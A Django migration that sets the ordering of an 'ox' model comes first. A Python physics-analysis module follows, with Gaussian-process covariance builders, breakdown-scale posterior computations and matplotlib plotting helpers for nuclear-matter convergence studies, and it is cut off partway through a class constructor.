from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('database_models', '0006_ox'),
]
operations = [
migrations.AlterModelOptions(
name='ox',
options={'ordering': ['horn_length'], 'verbose_name_plural': '뿔의 길이'},
),
]
| [
"django.db.migrations.AlterModelOptions"
] | [((219, 334), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""ox"""', 'options': "{'ordering': ['horn_length'], 'verbose_name_plural': '뿔의 길이'}"}), "(name='ox', options={'ordering': ['horn_length'\n ], 'verbose_name_plural': '뿔의 길이'})\n", (247, 334), False, 'from django.db import migrations\n')] |
import gsum as gm
import numpy as np
from numpy import ndarray
import matplotlib.pyplot as plt
from matplotlib.patches import Patch
import matplotlib.patches as mpatches
from matplotlib.patches import Ellipse
from matplotlib.legend_handler import HandlerPatch
from matplotlib.legend import Legend
from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator
import docrep
from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel
import seaborn as sns
from seaborn import utils
import pandas as pd
from .matter import nuclear_density, fermi_momentum, ratio_kf
from .graphs import confidence_ellipse, confidence_ellipse_mean_cov
from os.path import join
from scipy import stats
from copy import deepcopy
from os import path
docstrings = docrep.DocstringProcessor()
docstrings.get_sections(str(gm.ConjugateGaussianProcess.__doc__), 'ConjugateGaussianProcess')
black = 'k'
softblack = 'k'
gray = '0.75'
darkgray = '0.5'
text_bbox = dict(boxstyle='round', fc=(1, 1, 1, 0.6), ec=black, lw=0.8)
class HandlerEllipse(HandlerPatch):
def create_artists(self, legend, orig_handle,
xdescent, ydescent, width, height, fontsize, trans):
center = 0.5 * width - 0.5 * xdescent, 0.5 * height - 0.5 * ydescent
p = mpatches.Ellipse(xy=center, width=width + xdescent,
height=height + ydescent)
self.update_prop(p, orig_handle, legend)
p.set_transform(trans)
return [p]
Legend.update_default_handler_map({Ellipse: HandlerEllipse()})
def compute_breakdown_posterior(model, X, data, orders, max_idx, logprior, breakdowns, lengths=None):
"""Put this in the specific class?
Parameters
----------
model : gm.TruncationGP
X :
data
orders
max_idx
logprior
breakdowns
lengths
Returns
-------
pdf : ndarray, shape = (N,)
"""
model.fit(X, data[:, :max_idx+1], orders=orders[:max_idx+1])
if lengths is None:
log_ell = model.coeffs_process.kernel_.theta
lengths = np.exp(log_ell)
else:
log_ell = np.log(lengths)
log_like = np.array([[model.log_marginal_likelihood([t], breakdown=lb) for lb in breakdowns] for t in log_ell])
log_like += logprior
posterior_2d = np.exp(log_like - np.max(log_like))
breakdown_pdf = np.trapz(posterior_2d, x=lengths, axis=0)
breakdown_pdf /= np.trapz(breakdown_pdf, x=breakdowns) # Normalize
return breakdown_pdf
def compute_pdf_median_and_bounds(x, pdf, cred):
R"""Computes the median and credible intervals for a 1d pdf
Parameters
----------
x : 1d array
The input variable
pdf : 1d array
The normalized pdf
cred : Iterable
The credible intervals in the range (0, 1)
Returns
-------
median : float
bounds : ndarray, shape = (len(cred), 2)
"""
bounds = np.zeros((len(cred), 2))
for i, p in enumerate(cred):
bounds[i] = gm.hpd_pdf(pdf=pdf, alpha=p, x=x)
median = gm.median_pdf(pdf=pdf, x=x)
return median, bounds
def draw_summary_statistics(bounds68, bounds95, median, height=0., linewidth=1., ax=None):
if ax is None:
ax = plt.gca()
ax.plot(bounds68, [height, height], c=darkgray, lw=3*linewidth, solid_capstyle='round')
ax.plot(bounds95, [height, height], c=darkgray, lw=linewidth, solid_capstyle='round')
ax.plot([median], [height], c='white', marker='o', zorder=10, markersize=1.5*linewidth)
return ax
def offset_xlabel(ax):
ax.set_xticks([0])
ax.set_xticklabels(labels=[0], fontdict=dict(color='w'))
ax.tick_params(axis='x', length=0)
return ax
def joint_plot(ratio=1, height=3.):
"""Taken from Seaborn JointGrid"""
fig = plt.figure(figsize=(height, height))
gsp = plt.GridSpec(ratio+1, ratio+1)
ax_joint = fig.add_subplot(gsp[1:, :-1])
ax_marg_x = fig.add_subplot(gsp[0, :-1], sharex=ax_joint)
ax_marg_y = fig.add_subplot(gsp[1:, -1], sharey=ax_joint)
# Turn off tick visibility for the measure axis on the marginal plots
plt.setp(ax_marg_x.get_xticklabels(), visible=False)
plt.setp(ax_marg_y.get_yticklabels(), visible=False)
# Turn off the ticks on the density axis for the marginal plots
plt.setp(ax_marg_x.yaxis.get_majorticklines(), visible=False)
plt.setp(ax_marg_x.yaxis.get_minorticklines(), visible=False)
plt.setp(ax_marg_y.xaxis.get_majorticklines(), visible=False)
plt.setp(ax_marg_y.xaxis.get_minorticklines(), visible=False)
plt.setp(ax_marg_x.get_yticklabels(), visible=False)
plt.setp(ax_marg_y.get_xticklabels(), visible=False)
ax_marg_x.yaxis.grid(False)
ax_marg_y.xaxis.grid(False)
# Make the grid look nice
# utils.despine(fig)
utils.despine(ax=ax_marg_x, left=True)
utils.despine(ax=ax_marg_y, bottom=True)
fig.tight_layout(h_pad=0, w_pad=0)
ax_marg_y.tick_params(axis='y', which='major', direction='out')
ax_marg_x.tick_params(axis='x', which='major', direction='out')
ax_marg_y.tick_params(axis='y', which='minor', direction='out')
ax_marg_x.tick_params(axis='x', which='minor', direction='out')
ax_marg_y.margins(x=0.1, y=0.)
fig.subplots_adjust(hspace=0, wspace=0)
return fig, ax_joint, ax_marg_x, ax_marg_y
def compute_2d_posterior(model, X, data, orders, breakdown, ls=None, logprior=None, max_idx=None):
R"""
Parameters
----------
model : gm.TruncationGP
X : ndarray, shape = (N,None)
data : ndarray, shape = (N,[n_curves])
orders : ndarray, shape = (n_curves,)
max_idx : ndarray, shape = (n_orders,)
breakdown : ndarray, shape = (n_breakdown,)
ls : ndarray, shape = (n_ls,)
logprior : ndarray, optional, shape = (n_ls, n_breakdown)
Returns
-------
joint_pdf : ndarray
ratio_pdf : ndarray
ls_pdf : ndarray
"""
if max_idx is not None:
data = data[:, :max_idx + 1]
orders = orders[:max_idx + 1]
model.fit(X, data, orders=orders)
if ls is None:
ls = np.exp(model.coeffs_process.kernel_.theta)
print('Setting ls to', ls)
ls = np.atleast_1d(ls)
# log_like = np.array([
# [model.log_marginal_likelihood(theta=[np.log(ls_), ], breakdown=lb) for lb in breakdown] for ls_ in ls
# ])
from joblib import Parallel, delayed
import multiprocessing
num_cores = multiprocessing.cpu_count()
log_like = np.array(
Parallel(n_jobs=num_cores, prefer='processes')(
delayed(model.log_marginal_likelihood)(theta=[np.log(ls_), ], breakdown=lb)
for ls_ in ls for lb in breakdown
)
).reshape(len(ls), len(breakdown))
if logprior is not None:
log_like += logprior
joint_pdf = np.exp(log_like - np.max(log_like))
if len(ls) > 1:
ratio_pdf = np.trapz(joint_pdf, x=ls, axis=0)
else:
ratio_pdf = np.squeeze(joint_pdf)
ls_pdf = np.trapz(joint_pdf, x=breakdown, axis=-1)
# Normalize them
ratio_pdf /= np.trapz(ratio_pdf, x=breakdown, axis=0)
if len(ls) > 1:
ls_pdf /= np.trapz(ls_pdf, x=ls, axis=0)
return joint_pdf, ratio_pdf, ls_pdf
def plot_2d_joint(ls_vals, Lb_vals, like_2d, like_ls, like_Lb, data_str=r'\vec{\mathbf{y}}_k)',
xlabel=None, ylabel=None):
if data_str is None:
data_str = r'\vec{\mathbf{y}}_k)'
from matplotlib.cm import get_cmap
with plt.rc_context({"text.usetex": True, "text.latex.preview": True}):
cmap_name = 'Blues'
cmap = get_cmap(cmap_name)
# Setup axes
fig, ax_joint, ax_marg_x, ax_marg_y = joint_plot(ratio=5, height=3.4)
# Plot contour
ax_joint.contour(ls_vals, Lb_vals, like_2d.T,
levels=[np.exp(-0.5*r**2) for r in np.arange(9, 0, -0.5)] + [0.999],
cmap=cmap_name, vmin=-0.05, vmax=0.8, zorder=1)
# Now plot the marginal distributions
ax_marg_y.plot(like_Lb, Lb_vals, c=cmap(0.8), lw=1)
ax_marg_y.fill_betweenx(Lb_vals, np.zeros_like(like_Lb),
like_Lb, facecolor=cmap(0.2), lw=1)
ax_marg_x.plot(ls_vals, like_ls, c=cmap(0.8), lw=1)
ax_marg_x.fill_between(ls_vals, np.zeros_like(ls_vals),
like_ls, facecolor=cmap(0.2), lw=1)
# Formatting
ax_joint.set_xlabel(xlabel)
ax_joint.set_ylabel(ylabel)
ax_joint.margins(x=0, y=0.)
ax_marg_x.set_ylim(bottom=0)
ax_marg_y.set_xlim(left=0)
ax_joint.text(
0.95, 0.95, rf'pr$(\ell, \Lambda_b \,|\, {data_str}$)', ha='right', va='top',
transform=ax_joint.transAxes,
bbox=text_bbox
)
ax_joint.tick_params(direction='in')
plt.show()
return fig
def pdfplot(
x, y, pdf, data, hue=None, order=None, hue_order=None, cut=1e-2, linewidth=None,
palette=None, saturation=1., ax=None, margin=None, legend_title=None, loc='best'
):
R"""Like seaborn's violinplot, but takes PDF values rather than tabular data.
Parameters
----------
x : str
The column of the DataFrame to use as the x axis. The pdfs are a function of this variable.
y : str
The column of the DataFrame to use as the y axis. A pdf will be drawn for each unique value in data[y].
pdf : str
The column of the DataFrame to use as the pdf values.
data : pd.DataFrame
The DataFrame containing the pdf data
hue : str, optional
Splits data[y] up by the value of hue, and plots each pdf separately as a specific color.
order : list, optional
The order in which to plot the y values, from top to bottom
hue_order : list, optional
The order in which to plot the hue values, from top to bottom.
cut : float, optional
The value below which the pdfs will not be shown. This is taken as a fraction of the total height of each pdf.
linewidth : float, optional
The linewidth of the pdf lines
palette : str, list, optional
The color palette to fill underneath the curves
saturation : float, optional
The level of saturation for the color palette. Only works if the palette is a string recognized by
sns.color_palette
ax : matplotlib.axes.Axes
The axis on which to draw the plot
margin : float, optional
The vertical margin between each pdf.
"""
if ax is None:
fig, ax = plt.subplots(1, 1, figsize=(3.4, 3.4))
y_vals = data[y].unique()
if order is not None:
y_vals = order
legend_vals = y_vals
hue_vals = [None]
n_colors = len(y_vals)
if hue is not None:
hue_vals = data[hue].unique()
if hue_order is not None:
hue_vals = hue_order
legend_vals = hue_vals
n_colors = len(hue_vals)
if isinstance(palette, str) or palette is None:
colors = sns.color_palette(palette, n_colors=n_colors, desat=saturation)
elif isinstance(palette, list):
colors = palette
else:
raise ValueError('palette must be str or list')
if margin is None:
_, margin = plt.margins()
offset = 1.
minor_ticks = []
major_ticks = []
for i, y_val in enumerate(y_vals):
max_height_hue = offset - margin
for j, hue_val in enumerate(hue_vals):
mask = data[y] == y_val
if hue is not None:
mask = mask & (data[hue] == hue_val)
color = colors[j]
else:
color = colors[i]
df = data[mask]
x_vals = df[x].values
pdf_vals = df[pdf].values.copy()
pdf_vals /= np.trapz(pdf_vals, x_vals)
# Assumes normalized
median, bounds = compute_pdf_median_and_bounds(
x=x_vals, pdf=pdf_vals, cred=[0.68, 0.95]
)
pdf_vals /= (1. * np.max(pdf_vals)) # Scale so they're all the same height
# Make the lines taper off
x_vals = x_vals[pdf_vals > cut]
pdf_vals = pdf_vals[pdf_vals > cut]
offset -= (1 + margin)
# Plot and fill posterior, and add summary statistics
ax.plot(x_vals, pdf_vals + offset, c=darkgray, lw=linewidth)
ax.fill_between(x_vals, offset, pdf_vals + offset, facecolor=color)
draw_summary_statistics(*bounds, median, ax=ax, height=offset, linewidth=1.5*linewidth)
min_height_hue = offset
minor_ticks.append(offset - margin/2.)
major_ticks.append((max_height_hue + min_height_hue) / 2.)
minor_ticks = minor_ticks[:-1]
# Plot formatting
ax.set_yticks(major_ticks, minor=False)
ax.set_yticks(minor_ticks, minor=True)
ax.set_yticklabels(y_vals, fontdict=dict(verticalalignment='center'))
ax.tick_params(axis='both', which='both', direction='in')
ax.tick_params(which='major', length=0)
ax.tick_params(which='minor', length=7, right=True)
ax.set_xlabel(x)
ax.set_axisbelow(True)
if hue is not None:
legend_elements = [
Patch(facecolor=color, edgecolor=darkgray, label=leg_val) for color, leg_val in zip(colors, legend_vals)
]
ax.legend(handles=legend_elements, loc=loc, title=legend_title)
return ax
def joint2dplot(ls_df, breakdown_df, joint_df, system, order, data_str=None):
ls_df = ls_df[(ls_df['system'] == system) & (ls_df['Order'] == order)]
breakdown_df = breakdown_df[(breakdown_df['system'] == system) & (breakdown_df['Order'] == order)]
joint_df = joint_df[(joint_df['system'] == system) & (joint_df['Order'] == order)]
ls = ls_df[r'$\ell$ [fm$^{-1}$]']
breakdown = breakdown_df[r'$\Lambda_b$ [MeV]']
joint = joint_df['pdf'].values.reshape(len(ls), len(breakdown))
fig = plot_2d_joint(
ls_vals=ls, Lb_vals=breakdown, like_2d=joint,
like_ls=ls_df['pdf'].values, like_Lb=breakdown_df['pdf'].values,
data_str=data_str, xlabel=r'$\ell$ [fm$^{-1}$]', ylabel=r'$\Lambda_b$ [MeV]',
)
return fig
def minimum_samples(mean, cov, n=5000, x=None):
gp = stats.multivariate_normal(mean=mean, cov=cov)
samples = gp.rvs(n)
min_idxs = np.argmin(samples, axis=1)
min_y = np.min(samples, axis=1)
if x is not None:
min_x = x[min_idxs]
return min_x, min_y
return min_idxs, min_y
# def confidence_ellipse(x, y, ax, n_std=3.0, facecolor='none', **kwargs):
# """
# Create a plot of the covariance confidence ellipse of *x* and *y*.
#
# Parameters
# ----------
# x, y : array-like, shape (n, )
# Input data.
# ax : matplotlib.axes.Axes
# The axes object to draw the ellipse into.
# n_std : float
# The number of standard deviations to determine the ellipse's radii.
# facecolor : str
# The color of the ellipse
#
# Returns
# -------
# matplotlib.patches.Ellipse
#
# Other parameters
# ----------------
# kwargs : `~matplotlib.patches.Patch` properties
# """
# import matplotlib.transforms as transforms
# if x.size != y.size:
# raise ValueError("x and y must be the same size")
#
# cov = np.cov(x, y)
# pearson = cov[0, 1]/np.sqrt(cov[0, 0] * cov[1, 1])
# # Using a special case to obtain the eigenvalues of this
# # two-dimensional dataset.
# ell_radius_x = np.sqrt(1 + pearson)
# ell_radius_y = np.sqrt(1 - pearson)
# ellipse = Ellipse(
# (0, 0),
# width=ell_radius_x * 2,
# height=ell_radius_y * 2,
# facecolor=facecolor,
# **kwargs
# )
#
# # Calculating the standard deviation of x from
# # the square root of the variance and multiplying
# # with the given number of standard deviations.
# scale_x = np.sqrt(cov[0, 0]) * n_std
# mean_x = np.mean(x)
#
# # calculating the standard deviation of y ...
# scale_y = np.sqrt(cov[1, 1]) * n_std
# mean_y = np.mean(y)
#
# trans = transforms.Affine2D() \
# .rotate_deg(45) \
# .scale(scale_x, scale_y) \
# .translate(mean_x, mean_y)
#
# ellipse.set_transform(trans + ax.transData)
# # sns.kdeplot(x, y, ax=ax)
# scat_color = darken_color(facecolor, 0.5)
# ax.plot(x, y, ls='', marker='.', markersize=0.6, color=scat_color)
# ax.add_patch(ellipse)
# return ellipse
def lighten_color(color, amount=0.5):
"""
Lightens the given color by multiplying (1-luminosity) by the given amount.
Input can be matplotlib color string, hex string, or RGB tuple.
Examples:
>> lighten_color('g', 0.3)
>> lighten_color('#F034A3', 0.6)
>> lighten_color((.3,.55,.1), 0.5)
"""
import matplotlib.colors as mc
import colorsys
try:
c = mc.cnames[color]
except:
c = color
c = colorsys.rgb_to_hls(*mc.to_rgb(c))
return colorsys.hls_to_rgb(c[0], 1 - amount * (1 - c[1]), c[2])
def darken_color(color, amount=0.5):
"""
Darken the given color by multiplying (1-luminosity) by the given amount.
Input can be matplotlib color string, hex string, or RGB tuple.
Examples:
>> darken_color('g', 0.3)
>> darken_color('#F034A3', 0.6)
>> darken_color((.3,.55,.1), 0.5)
"""
return lighten_color(color, 1./amount)
def cov_no_centering(m, y=None, rowvar=True, bias=False, ddof=None, fweights=None,
aweights=None):
"""Copied from numpy.cov, but commented out the centering. Why isn't this toggleable with an argument?
Estimate a covariance matrix, given data and weights.
Covariance indicates the level to which two variables vary together.
If we examine N-dimensional samples, :math:`X = [x_1, x_2, ... x_N]^T`,
then the covariance matrix element :math:`C_{ij}` is the covariance of
:math:`x_i` and :math:`x_j`. The element :math:`C_{ii}` is the variance
of :math:`x_i`.
See the notes for an outline of the algorithm.
Parameters
----------
m : array_like
A 1-D or 2-D array containing multiple variables and observations.
Each row of `m` represents a variable, and each column a single
observation of all those variables. Also see `rowvar` below.
y : array_like, optional
An additional set of variables and observations. `y` has the same form
as that of `m`.
rowvar : bool, optional
If `rowvar` is True (default), then each row represents a
variable, with observations in the columns. Otherwise, the relationship
is transposed: each column represents a variable, while the rows
contain observations.
bias : bool, optional
Default normalization (False) is by ``(N - 1)``, where ``N`` is the
number of observations given (unbiased estimate). If `bias` is True,
then normalization is by ``N``. These values can be overridden by using
the keyword ``ddof`` in numpy versions >= 1.5.
ddof : int, optional
If not ``None`` the default value implied by `bias` is overridden.
Note that ``ddof=1`` will return the unbiased estimate, even if both
`fweights` and `aweights` are specified, and ``ddof=0`` will return
the simple average. See the notes for the details. The default value
is ``None``.
.. versionadded:: 1.5
fweights : array_like, int, optional
1-D array of integer frequency weights; the number of times each
observation vector should be repeated.
.. versionadded:: 1.10
aweights : array_like, optional
1-D array of observation vector weights. These relative weights are
typically large for observations considered "important" and smaller for
observations considered less "important". If ``ddof=0`` the array of
weights can be used to assign probabilities to observation vectors.
.. versionadded:: 1.10
Returns
-------
out : ndarray
The covariance matrix of the variables.
See Also
--------
corrcoef : Normalized covariance matrix
Notes
-----
Assume that the observations are in the columns of the observation
array `m` and let ``f = fweights`` and ``a = aweights`` for brevity. The
steps to compute the weighted covariance are as follows::
>>> m = np.arange(10, dtype=np.float64)
>>> f = np.arange(10) * 2
>>> a = np.arange(10) ** 2.
>>> ddof = 9 # N - 1
>>> w = f * a
>>> v1 = np.sum(w)
>>> v2 = np.sum(w * a)
>>> m -= np.sum(m * w, axis=None, keepdims=True) / v1
>>> cov = np.dot(m * w, m.T) * v1 / (v1**2 - ddof * v2)
Note that when ``a == 1``, the normalization factor
``v1 / (v1**2 - ddof * v2)`` goes over to ``1 / (np.sum(f) - ddof)``
as it should.
Examples
--------
Consider two variables, :math:`x_0` and :math:`x_1`, which
correlate perfectly, but in opposite directions:
>>> x = np.array([[0, 2], [1, 1], [2, 0]]).T
>>> x
array([[0, 1, 2],
[2, 1, 0]])
Note how :math:`x_0` increases while :math:`x_1` decreases. The covariance
matrix shows this clearly:
>>> np.cov(x)
array([[ 1., -1.],
[-1., 1.]])
Note that element :math:`C_{0,1}`, which shows the correlation between
:math:`x_0` and :math:`x_1`, is negative.
Further, note how `x` and `y` are combined:
>>> x = [-2.1, -1, 4.3]
>>> y = [3, 1.1, 0.12]
>>> X = np.stack((x, y), axis=0)
>>> np.cov(X)
array([[11.71 , -4.286 ], # may vary
[-4.286 , 2.144133]])
>>> np.cov(x, y)
array([[11.71 , -4.286 ], # may vary
[-4.286 , 2.144133]])
>>> np.cov(x)
array(11.71)
"""
from numpy import array, average, dot
import warnings
# Check inputs
if ddof is not None and ddof != int(ddof):
raise ValueError(
"ddof must be integer")
# Handles complex arrays too
m = np.asarray(m)
if m.ndim > 2:
raise ValueError("m has more than 2 dimensions")
if y is None:
dtype = np.result_type(m, np.float64)
else:
y = np.asarray(y)
if y.ndim > 2:
raise ValueError("y has more than 2 dimensions")
dtype = np.result_type(m, y, np.float64)
X = array(m, ndmin=2, dtype=dtype)
if not rowvar and X.shape[0] != 1:
X = X.T
if X.shape[0] == 0:
return np.array([]).reshape(0, 0)
if y is not None:
y = array(y, copy=False, ndmin=2, dtype=dtype)
if not rowvar and y.shape[0] != 1:
y = y.T
X = np.concatenate((X, y), axis=0)
if ddof is None:
if bias == 0:
ddof = 1
else:
ddof = 0
# Get the product of frequencies and weights
w = None
if fweights is not None:
fweights = np.asarray(fweights, dtype=float)
if not np.all(fweights == np.around(fweights)):
raise TypeError(
"fweights must be integer")
if fweights.ndim > 1:
raise RuntimeError(
"cannot handle multidimensional fweights")
if fweights.shape[0] != X.shape[1]:
raise RuntimeError(
"incompatible numbers of samples and fweights")
if any(fweights < 0):
raise ValueError(
"fweights cannot be negative")
w = fweights
if aweights is not None:
aweights = np.asarray(aweights, dtype=float)
if aweights.ndim > 1:
raise RuntimeError(
"cannot handle multidimensional aweights")
if aweights.shape[0] != X.shape[1]:
raise RuntimeError(
"incompatible numbers of samples and aweights")
if any(aweights < 0):
raise ValueError(
"aweights cannot be negative")
if w is None:
w = aweights
else:
w *= aweights
avg, w_sum = average(X, axis=1, weights=w, returned=True)
w_sum = w_sum[0]
# Determine the normalization
if w is None:
fact = X.shape[1] - ddof
elif ddof == 0:
fact = w_sum
elif aweights is None:
fact = w_sum - ddof
else:
fact = w_sum - ddof * sum(w * aweights) / w_sum
if fact <= 0:
warnings.warn("Degrees of freedom <= 0 for slice",
RuntimeWarning, stacklevel=3)
fact = 0.0
# X -= avg[:, None]
if w is None:
X_T = X.T
else:
X_T = (X * w).T
c = dot(X, X_T.conj())
c *= np.true_divide(1, fact)
return c.squeeze()
def create_rbf_cross_covariance(X1, X2, std1, std2, ls1, ls2, rho=None):
if rho is None:
ls_off = np.sqrt((ls1 ** 2 + ls2 ** 2) / 2)
rho = np.sqrt(2 * ls1 * ls2 / (ls1**2 + ls2**2))
else:
ls_off = ls1
k_off = ConstantKernel(std1 * std2) * RBF(ls_off)
K_off = k_off(X1, X2)
K_off *= rho
return K_off
def create_rbf_multi_covariance(X1, X2, std1, std2, ls1, ls2, nugget=0, rho=None):
k1 = ConstantKernel(std1 ** 2) * RBF(ls1)
if rho is None:
k2 = ConstantKernel(std2 ** 2) * RBF(ls2)
else:
k2 = ConstantKernel(std2 ** 2) * RBF(ls1)
K1 = k1(X1)
K2 = k2(X2)
K_off = create_rbf_cross_covariance(X1, X2, std1, std2, ls1, ls2, rho=rho)
K = np.block([
[K1, K_off],
[K_off.T, K2]
])
K[np.diag_indices_from(K)] += nugget
return K
def create_truncation_cross_covariance(X1, X2, std1, std2, ls1, ls2, ref1, ref2, Q1, Q2, kmin=0, kmax=None, rho=None):
K_off = create_rbf_cross_covariance(X1, X2, std1, std2, ls1, ls2, rho=rho)
ref1 = np.atleast_1d(ref1)
ref2 = np.atleast_1d(ref2)
Q_num1 = Q1 ** kmin
Q_num2 = Q2 ** kmin
if kmax is not None:
Q_num1 -= Q1 ** (kmax + 1)
Q_num2 -= Q2 ** (kmax + 1)
Q_sum1 = Q_num1 / np.sqrt(1 - Q1 ** 2)
Q_sum2 = Q_num2 / np.sqrt(1 - Q2 ** 2)
K_off = (ref1 * Q_sum1)[:, None] * (ref2 * Q_sum2) * K_off
return K_off
def create_truncation_multi_covariance(
X1, X2, std1, std2, ls1, ls2, ref1, ref2, Q1, Q2, kmin=0, kmax=None, nugget=0, rho=None):
ref1 = np.atleast_1d(ref1)
ref2 = np.atleast_1d(ref2)
# Must square now, take square root after subtracting
Q_num1 = Q1 ** (2 * kmin)
Q_num2 = Q2 ** (2 * kmin)
if kmax is not None:
Q_num1 -= Q1 ** (2 * (kmax + 1))
Q_num2 -= Q2 ** (2 * (kmax + 1))
Q_sum1 = np.sqrt(Q_num1) / np.sqrt(1 - Q1 ** 2)
Q_sum2 = np.sqrt(Q_num2) / np.sqrt(1 - Q2 ** 2)
k1 = ConstantKernel(std1 ** 2) * RBF(ls1)
if rho is None:
k2 = ConstantKernel(std2 ** 2) * RBF(ls2)
else:
k2 = ConstantKernel(std2 ** 2) * RBF(ls1)
K1 = k1(X1)
K2 = k2(X2)
K1 = (ref1 * Q_sum1)[:, None] * (ref1 * Q_sum1) * K1
K2 = (ref2 * Q_sum2)[:, None] * (ref2 * Q_sum2) * K2
K_off = create_truncation_cross_covariance(
X1, X2, std1, std2, ls1, ls2, ref1, ref2, Q1, Q2, kmin, kmax, rho=rho
)
K = np.block([
[K1, K_off],
[K_off.T, K2]
])
K[np.diag_indices_from(K)] += nugget
return K
def create_sym_energy_rbf_covariance(density, std_n, std_s, ls_n, ls_s, nugget=0, rho=None):
Kf_n = fermi_momentum(density, 2)[:, None]
Kf_s = fermi_momentum(density, 4)[:, None]
# Convert symmetric matter kf and ell to neutron matter
# The scaling is irrelevant for the kernel as long as it is consistent, but we must ensure that
# points *at the same density* are the most correlated in the off-diagonal block.
# therefore the conventions must be consistent. Else points at high density will
# be less correlated than points at low density.
factor = 2. ** (1 / 3.)
Kf_s = Kf_s * factor
if rho is None:
ls_s = ls_s * factor
# print(Kf_n - Kf_s)
cov = create_rbf_multi_covariance(
X1=Kf_n, X2=Kf_s, std1=std_n, std2=std_s, ls1=ls_n, ls2=ls_s, nugget=nugget, rho=rho
)
N = len(density)
cov_n = cov[:N, :N]
cov_s = cov[N:, N:]
cov_ns = cov[:N, N:]
cov_sn = cov[N:, :N]
return cov_n + cov_s - cov_ns - cov_sn
def create_sym_energy_truncation_covariance(
density, std_n, std_s, ls_n, ls_s, ref_n, ref_s, Q_n, Q_s, kmin=0, kmax=None, nugget=0, rho=None,
ignore_corr=False
):
Kf_n = fermi_momentum(density, 2)[:, None]
Kf_s = fermi_momentum(density, 4)[:, None]
# Convert symmetric matter kf and ell to neutron matter
# The scaling is irrelevant for the kernel as long as it is consistent, but we must ensure that
# points *at the same density* are the most correlated in the off-diagonal block.
# therefore the conventions must be consistent. Else points at high density will
# be less correlated than points at low density.
factor = 2. ** (1/3.)
Kf_s = Kf_s * factor
if rho is None:
ls_s = ls_s * factor
# print(Kf_n - Kf_s)
cov = create_truncation_multi_covariance(
X1=Kf_n, X2=Kf_s, std1=std_n, std2=std_s, ls1=ls_n, ls2=ls_s,
ref1=ref_n, ref2=ref_s, Q1=Q_n, Q2=Q_s, kmin=kmin, kmax=kmax, nugget=nugget, rho=rho
)
N = len(density)
cov_n = cov[:N, :N]
cov_s = cov[N:, N:]
cov_ns = cov[:N, N:]
cov_sn = cov[N:, :N]
if ignore_corr:
return cov_n + cov_s
return cov_n + cov_s - cov_ns - cov_sn
@docstrings.get_sectionsf('ConvergenceAnalysis')
@docstrings.dedent
class ConvergenceAnalysis:
R"""A generic class for studying convergence of observables.
This is meant to provide the framework for particular analyses, which should subclass this class.
Parameters
----------
X : ndarray, shape = (N,p)
The feature matrix
y : ndarray, shape = (N, n_curves)
The response curves
orders : ndarray, shape = (n_orders,)
train : ndarray, shape = (N,)
A boolean array that is `True` if that point is to be used to train the convergence model.
valid : ndarray, shape = (N,)
A boolean array that is `True` if that point is to be used to validate the convergence model.
ref : float or callable
The reference scale
ratio : float or callable
The ratio Q
excluded : ndarray, optional
The orders for which the coefficients should not be used in training the convergence model.
colors : ndarray, optional
Colors for plotting orders and their diagnostics.
Other Parameters
----------------
%(ConjugateGaussianProcess.parameters)s
"""
def __init__(self, X, y2, y3, orders, train, valid, ref2, ref3, ratio, body, *, excluded=None, colors=None, **kwargs):
self.X = X
self.orders_original = np.atleast_1d(orders)
marker_list = ['^', 'X', 'o', 's']
markerfillstyle_2bf = 'full'
markerfillstyle_3bf = 'left'
linestyle_2bf = '-'
linestyle_3bf = '--'
colors_original = colors
if body == 'Appended':
print('Appending 2bf and 3bf predictions...')
try:
ref3_vals = ref3(X)
except TypeError:
ref3_vals = ref3
try:
ref2_vals = ref2(X)
except TypeError:
ref2_vals = ref2
try:
ratio_vals = ratio(X)
except TypeError:
ratio_vals = ratio
c2 = gm.coefficients(y2, ratio_vals, ref2_vals, orders)
c3 = gm.coefficients(y3-y2, ratio_vals, ref3_vals, orders)
c = []
colors_all = []
orders_all = []
markers = []
markerfillstyles = []
linestyles = []
n_bodies = []
for i, n in enumerate(orders):
c.append(c2[:, i])
orders_all.append(n)
colors_all.append(colors[i])
markers.append(marker_list[i])
markerfillstyles.append(markerfillstyle_2bf)
linestyles.append(linestyle_2bf)
n_bodies.append('2')
if n > 2: # Has 3-body forces
c.append(c3[:, i])
orders_all.append(n)
colors_all.append(colors[i])
markers.append(marker_list[i])
markerfillstyles.append(markerfillstyle_3bf)
linestyles.append(linestyle_3bf)
n_bodies.append('3')
c = np.array(c).T
orders_all = np.array(orders_all)
print(f'Reseting orders to be {orders_all}')
y = gm.partials(c, ratio_vals, ref2_vals, orders_all)
self.y = y
self.orders = orders_all
self.ref = ref2
elif body == 'NN-only':
self.y = y2
self.orders = orders
self.ref = ref2
colors_all = colors
markerfillstyles = [markerfillstyle_2bf] * len(orders)
linestyles = [linestyle_2bf] * len(orders)
n_bodies = ['2'] * len(orders)
markers = marker_list
elif body == 'NN+3N':
self.y = y3
self.orders = orders
self.ref = ref2
colors_all = colors
markerfillstyles = [markerfillstyle_2bf] * len(orders)
linestyles = [linestyle_2bf] * len(orders)
# n_bodies = ['2+3'] * len(orders)
n_bodies = [None] * len(orders)
markers = marker_list
elif body == '3N':
self.y = y3 - y2
self.orders = orders
self.ref = ref3
colors_all = colors
markerfillstyles = [markerfillstyle_3bf] * len(orders)
linestyles = [linestyle_3bf] * len(orders)
n_bodies = ['3'] * len(orders)
markers = marker_list
else:
raise ValueError('body not in allowed values')
self.train = train
self.valid = valid
self.X_train = X[train]
self.X_valid = X[valid]
self.y2 = y2
if body != '3N':
self.y2_train = y2[train]
self.y2_valid = y2[valid]
else:
self.y2_train = None
self.y2_train = None
self.y3 = y3
if body != 'NN-only':
self.y3_train = y3[train]
self.y3_valid = y3[valid]
else:
self.y3_train = None
self.y3_train = None
self.y_train = self.y[train]
self.y_valid = self.y[valid]
self.n_bodies = n_bodies
self.ratio = ratio
# self.ref = ref
self.ref2 = ref2
self.ref3 = ref3
self.excluded = excluded
if excluded is None:
excluded_mask = np.ones_like(self.orders, dtype=bool)
else:
excluded_mask = ~np.isin(self.orders, excluded)
self.excluded_mask = excluded_mask
self.orders_not_excluded = self.orders[excluded_mask]
if excluded is None:
excluded_mask_original = np.ones_like(orders, dtype=bool)
else:
excluded_mask_original = ~np.isin(orders, excluded)
self.excluded_mask_original = excluded_mask_original
colors_all = np.atleast_1d(colors_all)
self.colors_not_excluded = colors_all[excluded_mask]
self.colors = colors_all
self.colors_original = colors_original = np.atleast_1d(colors_original)
